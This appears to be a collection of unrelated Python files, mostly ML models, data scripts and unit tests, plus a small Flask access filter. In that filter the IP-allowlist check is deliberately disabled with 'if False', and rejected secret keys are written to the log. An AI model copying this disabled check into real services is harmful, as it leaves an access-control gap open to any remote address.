torch.nn.Embedding(odim_src, attention_dim),
pos_enc_class(attention_dim, positional_dropout_rate)
)
elif input_layer == "linear":
self.embed = torch.nn.Sequential(
torch.nn.Linear(odim_tgt, attention_dim),
torch.nn.LayerNorm(attention_dim),
torch.nn.Dropout(dropout_rate),
torch.nn.ReLU(),
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
torch.nn.Linear(odim_src, attention_dim),
torch.nn.LayerNorm(attention_dim),
torch.nn.Dropout(dropout_rate),
torch.nn.ReLU(),
pos_enc_class(attention_dim, positional_dropout_rate)
)
elif isinstance(input_layer, torch.nn.Module):
self.embed = torch.nn.Sequential(
input_layer,
pos_enc_class(attention_dim, positional_dropout_rate)
)
self.embed_asr = torch.nn.Sequential(
input_layer,
pos_enc_class(attention_dim, positional_dropout_rate)
)
else:
raise NotImplementedError("only `embed` or torch.nn.Module is supported.")
self.normalize_before = normalize_before
self.adapter_names = adapter_names
self.dual_decoders = repeat(
num_blocks,
lambda: DualDecoderLayer(
attention_dim, attention_dim,
MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate),
PositionwiseFeedForward(attention_dim, linear_units, dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate),
MultiHeadedAttention(attention_heads, attention_dim, src_attention_dropout_rate),
PositionwiseFeedForward(attention_dim, linear_units, dropout_rate),
cross_self_attn=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_st) else None,
cross_self_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_self and cross_to_asr) else None,
cross_src_attn=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_src and cross_to_st) else None,
cross_src_attn_asr=MultiHeadedAttention(attention_heads, attention_dim, self_attention_dropout_rate) if (cross_src and cross_to_asr) else None,
dropout_rate=dropout_rate,
normalize_before=normalize_before,
concat_after=concat_after,
cross_operator=cross_operator,
cross_weight_learnable=cross_weight_learnable,
cross_weight=cross_weight,
cross_to_asr=cross_to_asr,
cross_to_st=cross_to_st,
adapters=nn.ModuleDict({k: Adapter(attention_dim, attention_dim//reduction_factor)
for k in adapter_names}) if adapter_names else None,
)
)
if self.normalize_before:
self.after_norm = LayerNorm(attention_dim)
self.after_norm_asr = LayerNorm(attention_dim)
if use_output_layer:
self.output_layer = torch.nn.Linear(attention_dim, odim_tgt)
self.output_layer_asr = torch.nn.Linear(attention_dim, odim_src)
else:
self.output_layer = None
self.output_layer_asr = None
def forward(self, tgt, tgt_mask, tgt_asr, tgt_mask_asr,
memory, memory_mask,
cross_mask, cross_mask_asr,
cross_self=False, cross_src=False,
cross_self_from="before-self", cross_src_from="before-src"):
"""Forward decoder.
:param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out) if input_layer == "embed"
input tensor (batch, maxlen_out, #mels) in the other cases
:param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out)
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (include 1.2)
:param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat)
:param torch.Tensor memory_mask: encoded memory mask, (batch, maxlen_in)
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (include 1.2)
:return x: decoded token score before softmax (batch, maxlen_out, token) if use_output_layer is True,
final block outputs (batch, maxlen_out, attention_dim) in the other cases
:rtype: torch.Tensor
:return tgt_mask: score mask before softmax (batch, maxlen_out)
:rtype: torch.Tensor
"""
x = self.embed(tgt)
x_asr = self.embed_asr(tgt_asr)
if self.adapter_names:
lang_id = str(tgt[:, 0:1][0].item())
else:
lang_id = None
x, tgt_mask, x_asr, tgt_mask_asr, memory, memory_mask, _, _, _, _, _, _ = self.dual_decoders(x, tgt_mask, x_asr, tgt_mask_asr,
memory, memory_mask, cross_mask, cross_mask_asr,
cross_self, cross_src, cross_self_from, cross_src_from,
lang_id)
if self.normalize_before:
x = self.after_norm(x)
x_asr = self.after_norm_asr(x_asr)
if self.output_layer is not None:
x = self.output_layer(x)
x_asr = self.output_layer_asr(x_asr)
return x, tgt_mask, x_asr, tgt_mask_asr
def forward_one_step(self, tgt, tgt_mask,
tgt_asr, tgt_mask_asr,
memory,
cross_mask=None, cross_mask_asr=None,
cross_self=False, cross_src=False,
cross_self_from="before-self", cross_src_from="before-src",
cache=None, cache_asr=None):
"""Forward one step.
:param torch.Tensor tgt: input token ids, int64 (batch, maxlen_out)
:param torch.Tensor tgt_mask: input token mask, (batch, maxlen_out)
dtype=torch.uint8 in PyTorch 1.2-
dtype=torch.bool in PyTorch 1.2+ (include 1.2)
:param torch.Tensor memory: encoded memory, float32 (batch, maxlen_in, feat)
:param List[torch.Tensor] cache: cached output list of (batch, max_time_out-1, size)
:return y, cache: NN output value and cache per `self.decoders`.
`y.shape` is (batch, maxlen_out, token)
:rtype: Tuple[torch.Tensor, List[torch.Tensor]]
"""
x = self.embed(tgt)
x_asr = self.embed_asr(tgt_asr)
if cache is None:
cache = self.init_state()
if cache_asr is None:
cache_asr = self.init_state()
new_cache = []
new_cache_asr = []
for c, c_asr, dual_decoder in zip(cache, cache_asr, self.dual_decoders):
x, tgt_mask, x_asr, tgt_mask_asr, memory, _, _, _, _, _, _, _ = dual_decoder(x, tgt_mask, x_asr, tgt_mask_asr,
memory, None, cross_mask, cross_mask_asr,
cross_self, cross_src,
cross_self_from, cross_src_from,
cache=c, cache_asr=c_asr)
new_cache.append(x)
new_cache_asr.append(x_asr)
if self.normalize_before:
y = self.after_norm(x[:, -1])
y_asr = self.after_norm_asr(x_asr[:, -1])
else:
y = x[:, -1]
y_asr = x_asr[:, -1]
if self.output_layer is not None:
y = torch.log_softmax(self.output_layer(y), dim=-1)
y_asr = torch.log_softmax(self.output_layer_asr(y_asr), dim=-1)
return y, new_cache, y_asr, new_cache_asr
# beam search API (see ScorerInterface)
def init_state(self, x=None):
"""Get an initial state for decoding."""
return [None for i in range(len(self.dual_decoders))]
|
import numpy as np
from math import sqrt
import pandas as pd
class KNN_regresion_Jose:
# Initialize class variables
def __init__(self, file_name):
# Read from data set to a numpy array
self.data_set_reg = np.genfromtxt(file_name, delimiter=',')
self.entries_data = np.shape(self.data_set_reg)[0]
self.len_data = np.shape(self.data_set_reg[0])[0]
self.testing_data_set = None
self.len_test_data = None
# DISTANCE FORMULA FUNCTIONS
# Calculates the euclidean distance between 2 vectors
def distance_euclidean(self, c: "Int", target) -> "Double":
return np.sqrt(np.sum(np.square(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1]))))
# Calculates the manhattan distance between 2 vectors
def distance_manhattan(self, c: "Int", target) -> "Double":
return np.sum(np.abs(np.subtract(target[:self.len_data - 1], self.data_set_reg[c, :self.len_data - 1])))
# FUNCTION SETTERS
def _set_k(self, k_measure: "string") -> "None":
switcher = {
'static-3': 3,
'static-10': 10,
'static-15': 15,
'squared': np.round(np.sqrt(self.entries_data)),
'n-fold': np.round(self.entries_data / self.len_test_data) + 1
}
self.k = switcher.get(k_measure)
# This method switches the distance calculating parameter depending on passing parameter.
def _set_distance(self, distance: "string") -> "None":
switcher = {
'euclidean': self.distance_euclidean,
'manhattan': self.distance_manhattan
}
self.applier_distance = switcher.get(distance)
def value_regression(self, query_target):
# Create a Series with indexes of data set to be calculated
predicted_values = pd.Series(range(self.entries_data))
# Calculate the distance between each entry in the data set and the query target
distances_computed = predicted_values.apply(lambda f: self.applier_distance(f, query_target))
# Obtain the indexes corresponding with the closest distances
sorted_distances = np.argsort(distances_computed)
# Calculate the formula for regression
counted_distances = 0
computed_distances = 0
for i in sorted_distances[:self.k]:
distance = 1/np.square(distances_computed[i])
counted_distances += distance
computed_distances += distance * self.data_set_reg[i, self.len_data - 1]
return computed_distances / counted_distances
def test_accuracy(self, file, k_set, distance):
# Get the values of the testing data set
self.testing_data_set = np.genfromtxt(file, delimiter=',')
self.len_test_data = np.shape(self.testing_data_set)[0]
# Set the K and distance to calculate
self._set_k(k_set)
self._set_distance(distance)
# Get the average of the true values
average_total = np.mean(self.testing_data_set[:, self.len_data - 1], dtype=np.float64)
# Calculate the squared residuals and the sum of squares
squared_residuals = 0
sum_of_squares = 0
for x in range(self.len_test_data):
predicted_value = self.value_regression(self.testing_data_set[x])
squared_residuals += np.square(predicted_value - self.testing_data_set[x, self.len_data - 1])
sum_of_squares += np.square(average_total - self.testing_data_set[x, self.len_data - 1])
# Final R squared
r_squared = 1 - (squared_residuals / sum_of_squares)
# Print results obtained
print('The R squared is {:f}.'.format(r_squared))
print('The parameters used are: K {0} and distance {1}.\n\n'.format(k_set, distance))
dert = KNN_regresion_Jose('regressionData/trainingData.csv')
for k in ['static-3', 'static-10', 'static-15', 'squared', 'n-fold']:
for tech in ['euclidean', 'manhattan']:
dert.test_accuracy('regressionData/testData.csv', k, tech)
|
"""Tests runner.py module."""
from __future__ import print_function
import unittest
from mock import patch
import test_runners.tf_models.runner as runner
class TestRunBenchmark(unittest.TestCase):
"""Tests for runner.py module."""
@patch('test_runners.tf_models.runner.TestRunner.run_test_suite')
@patch('test_runners.tf_models.runner.TestRunner._make_log_dir')
def test_resnet50_256_gpu_1_real_fp16(self, _, run_test_suite_mock):
"""Tests init TestRunner and running a mocked single gpu test."""
run = runner.TestRunner('/workspace', '/workspace/git/tf_models')
run.resnet50_256_gpu_1_real_fp16()
test_config = run_test_suite_mock.call_args[0][0]
# check GPU args and count
self.assertEqual(test_config['gpus'], 1)
self.assertEqual(test_config['batch_size'], 256)
self.assertEqual(test_config['args']['batch_size'], 256)
self.assertEqual(test_config['args']['dtype'], 'fp16')
self.assertEqual(test_config['test_id'],
'official.resnet50.gpu_1.256.fp16.real')
self.assertIn('model', test_config)
@patch('test_runners.tf_models.runner.TestRunner.run_test_suite')
@patch('test_runners.tf_models.runner.TestRunner._make_log_dir')
def test_resnet50_128_gpu_8_real(self, _, run_test_suite_mock):
"""Tests init TestRunner and running a mocked single gpu test."""
run = runner.TestRunner('/workspace', '/workspace/git/tf_models')
run.resnet50_128_gpu_8_real()
test_config = run_test_suite_mock.call_args[0][0]
# check GPU args and count
self.assertEqual(test_config['gpus'], 8)
self.assertEqual(test_config['batch_size'], 128)
self.assertEqual(test_config['args']['data_dir'], '/data/imagenet')
self.assertEqual(test_config['args']['batch_size'], 8*128)
self.assertEqual(test_config['args']['resnet_version'], 1)
self.assertEqual(test_config['args']['dtype'], 'fp32')
self.assertEqual(test_config['test_id'], 'official.resnet50.gpu_8.128.real')
self.assertIn('model', test_config)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 1/22/2019 11:52 AM
# @Author : Xiang Chen (Richard)
# @File : label_data_tfrecord.py
# @Software: PyCharm
import tensorflow as tf
import os
import numpy as np
from PIL import Image
IMAGE_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/'
IMAGE_LABEL_PATH = '/home/ucesxc0/richard/AIS_data_Danish/tianjin_image_result/'
train_label = []
test_label = []
# open files
with open(IMAGE_LABEL_PATH + r'\label.txt') as f:
i = 1
for line in f.readlines():
if i % 20 == 0:
test_label.append(line)
else:
train_label.append(line)
i += 1
np.random.shuffle(train_label)
np.random.shuffle(test_label)
# transfer the labels
def int_to_one_hot(labels):
label = []
if labels[0] == -1:
label.append([0, 0, 0])
else:
label.append([1, 0, 0])
if labels[1] == -1:
label.append([0, 0, 0])
else:
label.append([0, 1, 0])
if labels[2] == -1:
label.append([0, 0, 0])
else:
label.append([0, 0, 1])
return label
def image_to_tfrecords(list, tf_record_path):
tf_write = tf.python_io.TFRecordWriter(tf_record_path)
for i in range(len(list)):
item = list[i]
item = item.strip('\n')
items = item.split(',')
image_name = items[0]
image_path = os.path.join(IMAGE_PATH, image_name)
if os.path.isfile(image_path):
image = Image.open(image_path)
image = image.tobytes()
features = {}
features['raw_image'] = tf.train.Feature(
bytes_list=tf.train.BytesList(value=[image]))
labels = int_to_one_hot(items[1:])
features['label_1'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[0]))
features['label_2'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[1]))
features['label_3'] = tf.train.Feature(
int64_list=tf.train.Int64List(value=labels[2]))
tf_features = tf.train.Features(feature=features)
example = tf.train.Example(features=tf_features) # protocol buffer
tf_serialized = example.SerializeToString()
tf_write.write(tf_serialized)
else:
print("not")
tf_write.close()
image_to_tfrecords(train_label,
'/home/ucesxc0/Scratch/output/training_CNN_new_dataset/train.tfrecords')
image_to_tfrecords(test_label,
'/home/ucesxc0/Scratch/output/training_CNN_new_dataset/test.tfrecords')
|
import tensorflow as tf
from .model import Model
class SRCNN(Model):
def __init__(self, args):
super().__init__(args)
self._prediction_offset = 6
self._lr_offset = self._prediction_offset // self._scale_factor
def get_data(self):
data_batch, initializer = self.dataset.get_data()
lr_batch = tf.cast(data_batch['lr1'], tf.float32) / 255.0
hr_batch = tf.cast(data_batch['hr'], tf.float32) / 255.0
return [lr_batch, hr_batch], initializer
def get_placeholder(self):
input_ph = tf.placeholder(tf.float32, shape=[1, None, None, 1], name="x")
return [input_ph]
def load_model(self, data_batch):
lr_batch = data_batch[0]
with tf.variable_scope('srcnn'):
if self._using_dataset:
net = tf.image.resize_bicubic(lr_batch, (self._scale_factor * lr_batch.shape[1],
self._scale_factor * lr_batch.shape[2]), align_corners=True)
else:
net = tf.pad(lr_batch, [[0, 0], [6, 6], [6, 6], [0, 0]], 'SYMMETRIC')
net = tf.layers.conv2d(net, 64, 9, activation=tf.nn.relu, padding='valid', name='conv1',
kernel_initializer=tf.keras.initializers.he_normal())
net = tf.layers.conv2d(net, 32, 1, activation=tf.nn.relu, padding='valid', name='conv2',
kernel_initializer=tf.keras.initializers.he_normal())
net = tf.layers.conv2d(net, 1, 5, activation=tf.nn.relu, padding='valid',
name='conv3', kernel_initializer=tf.keras.initializers.he_normal())
predicted_batch = tf.maximum(net, 0.0)
srcnn_variables = tf.trainable_variables(scope='srcnn')
for variable in srcnn_variables:
if 'conv3' in variable.name:
self.lr_multipliers[variable.name] = 0.1
else:
self.lr_multipliers[variable.name] = 1.0
if self._using_dataset:
tf.summary.image('Low_resolution',
data_batch[0][:, self._lr_offset:-self._lr_offset, self._lr_offset:-self._lr_offset],
max_outputs=self._save_num)
tf.summary.image('High_resolution',
data_batch[1][:, self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
max_outputs=self._save_num)
tf.summary.image('High_resolution_prediction', predicted_batch, max_outputs=self._save_num)
return predicted_batch
def get_loss(self, data_batch, predicted_batch):
loss = tf.losses.mean_squared_error(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch)
tf.summary.scalar('MSE', loss)
tf.summary.scalar('PSNR', tf.reduce_mean(tf.image.psnr(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
tf.summary.scalar('SSIM', tf.reduce_mean(tf.image.ssim(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
return loss
def calculate_metrics(self, data_batch, predicted_batch):
diff = data_batch[1][:, self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset] - predicted_batch
diff_sqr = tf.square(diff)
mse = ('MSE', tf.reduce_mean(diff_sqr, axis=[1, 2, 3]))
psnr = ('PSNR', tf.squeeze(tf.image.psnr(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
ssim = ('SSIM', tf.squeeze(tf.image.ssim(
data_batch[1][:,
self._prediction_offset:-self._prediction_offset,
self._prediction_offset:-self._prediction_offset],
predicted_batch,
max_val=1.0)))
return [mse, psnr, ssim]
|
from . import app
from flask import abort, request
import socket
def resolve_dns(domain_name):
try:
return socket.gethostbyname(domain_name)
except socket.gaierror as e:
return None
def whitelist_ips():
return (ip
for ip in (resolve_dns(dns) for dns in app.config['DNS_WHITELIST'])
if ip is not None)
@app.before_request
def verify_secret_key():
try:
secret_key = request.view_args['secret_key']
except (KeyError, TypeError):
return abort(404)
if secret_key != app.config['SECRET_KEY']:
app.logger.warning('invalid secret key: %s', secret_key)
return abort(403)
@app.before_request
def limit_remote_addr():
# TODO: whitelist pivotal urls
if False and request.remote_addr not in whitelist_ips():
app.logger.warning('remote_addr(%s) not whitelisted. whitelist: %r',
request.remote_addr, list(whitelist_ips()))
abort(403)
app.logger.info('request accepted from %s', request.remote_addr)
|
from django.apps import AppConfig
class VoaConfig(AppConfig):
name = 'voa'
|
# 一段格式錯誤的有效代碼例子
x = 12
if x== 24:
print('Is valid')
else:
print("Is not valid")
def helper(name='sample'):
pass
def another( name = 'sample'):
pass
print()
# 文檔字符串例子
def print_hello(name: str) -> str:
"""
Greets the user by name
Parameters
name(str): The name of the user
Returns
str: The greeting
"""
print('Hello,' + name)
print_hello('heisenberg')
|
from ..functions.plural_word import plural_word
def plural_time(number: int) -> str:
if number >= 3600:
number //= 3600
unit = 'godzin'
elif number >= 60:
number //= 60
unit = 'minut'
else:
unit = 'sekund'
return plural_word(number, one=unit + 'ę', few=unit + 'y', many=unit)
|
from guacamol.distribution_learning_benchmark import ValidityBenchmark, UniquenessBenchmark, NoveltyBenchmark, \
KLDivBenchmark
from guacamol.assess_distribution_learning import _assess_distribution_learning
from .mock_generator import MockGenerator
import numpy as np
import tempfile
from os.path import join
def test_validity_does_not_penalize_duplicates():
generator = MockGenerator(['CCC', 'CCC'])
benchmark = ValidityBenchmark(number_samples=2)
assert benchmark.assess_model(generator).score == 1.0
def test_validity_score_is_proportion_of_valid_molecules():
generator = MockGenerator(['CCC', 'CC(CC)C', 'invalidMolecule'])
benchmark = ValidityBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_uniqueness_penalizes_duplicates():
generator = MockGenerator(['CCC', 'CCC', 'CCC'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0 / 3.0
def test_uniqueness_penalizes_duplicates_with_different_smiles_strings():
generator = MockGenerator(['C(O)C', 'CCO', 'OCC'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0 / 3.0
def test_uniqueness_does_not_penalize_invalid_molecules():
generator = MockGenerator(['C(O)C', 'invalid1', 'invalid2', 'CCC', 'NCCN'])
benchmark = UniquenessBenchmark(number_samples=3)
assert benchmark.assess_model(generator).score == 1.0
def test_novelty_score_is_zero_if_no_molecule_is_new():
molecules = ['CCOCC', 'NNNNONNN', 'C=CC=C']
generator = MockGenerator(molecules)
benchmark = NoveltyBenchmark(number_samples=3, training_set=molecules)
assert benchmark.assess_model(generator).score == 0.0
def test_novelty_score_is_one_if_all_molecules_are_new():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
assert benchmark.assess_model(generator).score == 1.0
def test_novelty_score_does_not_penalize_duplicates():
generator = MockGenerator(['CCOCC', 'O(CC)CC', 'C=CC=C', 'CC'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
# Gets 2 out of 3: one of the duplicated molecules is ignored, so the sampled molecules are
# ['CCOCC', 'C=CC=C', 'CC'], and 'CC' is not novel
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_novelty_score_penalizes_invalid_molecules():
generator = MockGenerator(['CCOCC', 'invalid1', 'invalid2', 'CCCC', 'CC'])
benchmark = NoveltyBenchmark(number_samples=3, training_set=['CO', 'CC'])
assert benchmark.assess_model(generator).score == 2.0 / 3.0
def test_KLdiv_benchmark_same_dist():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = KLDivBenchmark(number_samples=3, training_set=['CCOCC', 'NNNNONNN', 'C=CC=C'])
result = benchmark.assess_model(generator)
print(result.metadata)
assert np.isclose(result.score, 1.0, )
def test_KLdiv_benchmark_different_dist():
generator = MockGenerator(['CCOCC', 'NNNNONNN', 'C=CC=C'])
benchmark = KLDivBenchmark(number_samples=3, training_set=['FCCOCC', 'CC(CC)CCCCNONNN', 'C=CC=O'])
result = benchmark.assess_model(generator)
print(result.metadata)
assert result.metadata['number_samples'] == 3
assert result.metadata.get('kl_divs') is not None
assert result.metadata['kl_divs'].get('BertzCT') > 0
assert result.metadata['kl_divs'].get('MolLogP', None) > 0
assert result.metadata['kl_divs'].get('MolWt', None) > 0
assert result.metadata['kl_divs'].get('TPSA', None) > 0
assert result.metadata['kl_divs'].get('NumHAcceptors', None) > 0
assert result.metadata['kl_divs'].get('NumHDonors', None) > 0
assert result.metadata['kl_divs'].get('NumRotatableBonds', None) > 0
assert result.score < 1.0
def test_distribution_learning_suite_v1():
generator = MockGenerator(
['CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC', 'CCF', 'CCCOCC', 'NNNNONNN', 'C=CC=C'] * 10)
mock_chembl = ['FCCOCC', 'C=CC=O', 'CCl', 'CCOCCCl', 'ClCCF', 'CCCOCCOCCCO', 'CF', 'CCOCC',
'CCF']
temp_dir = tempfile.mkdtemp()
smiles_path = join(temp_dir, 'mock.smiles')
with open(smiles_path, 'w') as f:
for i in mock_chembl:
f.write(f'{i}\n')
f.close()
json_path = join(temp_dir, 'output.json')
_assess_distribution_learning(model=generator,
chembl_training_file=smiles_path,
json_output_file=json_path,
benchmark_version='v1',
number_samples=4)
with open(json_path, 'r') as f:
print(f.read())
|
# -*- coding: utf-8 -*-
from django.test import TestCase, Client
from django.urls import reverse
import json
from loginSystem.models import Administrator, ACL
from plogical.CyberCPLogFileWriter import CyberCPLogFileWriter as logging
# Create your tests here.
class TestUserManagement(TestCase):
def setUp(self):
## Initiate Client
self.client = Client()
self.adminLogin = reverse('adminLogin')
self.verifyLogin = reverse('verifyLogin')
## Create Login User
response = self.client.get(self.adminLogin)
#
self.assertTemplateUsed(response, 'loginSystem/login.html')
self.submitUserCreation = reverse('submitUserCreation')
self.submitUserDeletion = reverse('submitUserDeletion')
self.saveModifications = reverse('saveModifications')
self.fetchUserDetails = reverse('fetchUserDetails')
self.saveResellerChanges = reverse('saveResellerChanges')
self.createACLFunc = reverse('createACLFunc')
self.deleteACLFunc = reverse('deleteACLFunc')
self.submitACLModifications = reverse('submitACLModifications')
self.saveChangesAPIAccess = reverse('saveChangesAPIAccess')
## Verify login
data_ret = {'username': 'admin', 'password': '1234567'}
json_data = json.dumps(data_ret)
response = self.client.post(self.verifyLogin, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['loginStatus'], 1)
def test_submitUserCreation(self):
## Login
data_ret = {'firstName': 'Usman', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com', 'userName': 'usman',
'password': '1234567', 'websitesLimit': 50, 'selectedACL':'user', 'securityLevel': 'HIGH'}
json_data = json.dumps(data_ret)
response = self.client.post(self.submitUserCreation, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['createStatus'], 1)
self.assertEqual(Administrator.objects.filter(userName='usman').count(), 1)
def test_submitUserDeletion(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman'}
json_data = json.dumps(data_ret)
response = self.client.post(self.submitUserDeletion, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['deleteStatus'], 1)
self.assertEqual(Administrator.objects.filter(userName='usman').count(), 0)
def test_saveModifications(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman','firstName': 'Rehan', 'lastName': 'Nasir', 'email': 'usman@cyberpersons.com',
'securityLevel': "LOW", 'password': '1234567'}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveModifications, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(json_data['saveStatus'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').firstName, 'Rehan')
self.assertEqual(Administrator.objects.get(userName='usman').lastName, 'Nasir')
self.assertEqual(Administrator.objects.get(userName='usman').securityLevel, 1)
def test_saveResellerChangess(self):
self.test_submitUserCreation()
data_ret = {'newOwner': 'admin', 'userToBeModified':'usman', 'websitesLimit': 100}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveResellerChanges, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').initWebsitesLimit, 100)
def test_createACLFunc(self):
data_ret = {'aclName': 'hello', 'makeAdmin':1,
'createNewUser': 1,
'versionManagement': 1,
'listUsers': 1,
'resellerCenter': 1,
'deleteUser': 1,
'changeUserACL': 1,
'createWebsite': 1,
'modifyWebsite': 1,
'suspendWebsite': 1,
'deleteWebsite': 1,
'createPackage': 1,
'listPackages': 1,
'deletePackage': 1,
'modifyPackage': 1,
'createDatabase': 1,
'deleteDatabase': 1,
'listDatabases': 1,
'createNameServer': 1,
'createDNSZone': 1,
'deleteZone': 1,
'addDeleteRecords': 1,
'createEmail': 1,
'listEmails': 1,
'deleteEmail': 1,
'emailForwarding': 1,
'changeEmailPassword': 1,
'dkimManager': 1,
'createFTPAccount': 1,
'deleteFTPAccount': 1,
'listFTPAccounts': 1,
'createBackup': 1,
'restoreBackup': 1,
'addDeleteDestinations': 1,
'scheDuleBackups': 1,
'remoteBackups': 1,
'manageSSL': 1,
'hostnameSSL': 1,
'mailServerSSL': 1}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.createACLFunc, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.filter(name='hello').count(), 1)
def test_deleteACLFunc(self):
self.test_createACLFunc()
data_ret = {'aclToBeDeleted': 'hello'}
json_data = json.dumps(data_ret)
response = self.client.post(self.deleteACLFunc, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.filter(name='hello').count(), 0)
def test_submitACLModifications(self):
self.test_createACLFunc()
data_ret = {'aclToModify': 'hello',
'adminStatus':1,
'createNewUser': 1,
'versionManagement': 1,
'listUsers': 1,
'resellerCenter': 1,
'deleteUser': 1,
'changeUserACL': 1,
'createWebsite': 1,
'modifyWebsite': 1,
'suspendWebsite': 1,
'deleteWebsite': 1,
'createPackage': 1,
'listPackages': 1,
'deletePackage': 1,
'modifyPackage': 1,
'createDatabase': 1,
'deleteDatabase': 1,
'listDatabases': 1,
'createNameServer': 1,
'createDNSZone': 1,
'deleteZone': 1,
'addDeleteRecords': 1,
'createEmail': 1,
'listEmails': 1,
'deleteEmail': 1,
'emailForwarding': 1,
'changeEmailPassword': 1,
'dkimManager': 1,
'createFTPAccount': 1,
'deleteFTPAccount': 1,
'listFTPAccounts': 1,
'createBackup': 1,
'restoreBackup': 1,
'addDeleteDestinations': 1,
'scheDuleBackups': 1,
'remoteBackups': 1,
'manageSSL': 1,
'hostnameSSL': 1,
'mailServerSSL': 0}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.submitACLModifications, json_data, content_type="application/json")
logging.writeToFile(response.content)
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
self.assertEqual(ACL.objects.get(name='hello').mailServerSSL, 0)
self.assertEqual(ACL.objects.get(name='hello').hostnameSSL, 1)
def test_saveChangesAPIAccess(self):
self.test_submitUserCreation()
data_ret = {'accountUsername': 'usman', 'access': 'Enable'}
json_data = json.dumps(data_ret)
## Modification
response = self.client.post(self.saveChangesAPIAccess, json_data, content_type="application/json")
json_data = json.loads(response.content)
self.assertEqual(json_data['status'], 1)
## Check Modification
# response = self.client.post(self.fetchUserDetails, json_data, content_type="application/json")
# logging.writeToFile(response.content)
# json_data = json.loads(response.content)
self.assertEqual(Administrator.objects.get(userName='usman').api, 1)
|
""" Core ML functions"""
import pandas as pd
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.multioutput import MultiOutputRegressor
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.model_selection import LeavePGroupsOut
from sklearn.preprocessing import RobustScaler
from sklearn.cluster import KMeans
def create_facies(df_logs):
""" Adds a facies column from clustering"""
pipe = make_pipeline(RobustScaler(), KMeans(n_clusters=4))
X = df_logs[['GR', 'RHOB', 'NPHI', 'DT']]
cluster_id = pipe.fit_predict(X)
df_logs['facies'] = cluster_id
df_logs['facies'] = 'facies_' + df_logs['facies'].astype(str)
return df_logs
def train_test_split(df_ml):
""" Split log data into train and test by well ID """
test_wells = set(['B03', 'B05', 'B06'])
train_wells = set(df_ml.HACKANAME.unique()) - test_wells
print('Train well: ', train_wells)
print('Test wells: ', test_wells)
mask_train = df_ml.HACKANAME.isin(train_wells)
df_ml_train = df_ml[mask_train]
df_ml_test = df_ml[~mask_train]
return df_ml_train, df_ml_test
def make_model(X_train, y_train, quantile=0.5):
""" Returns a trained model """
model = MultiOutputRegressor(GradientBoostingRegressor(loss='quantile', alpha=quantile))
model.fit(X_train, y_train)
return model
def make_multiple_models(df_ml_train, X_cols, y_cols):
""" Returns low, base and high trained models """
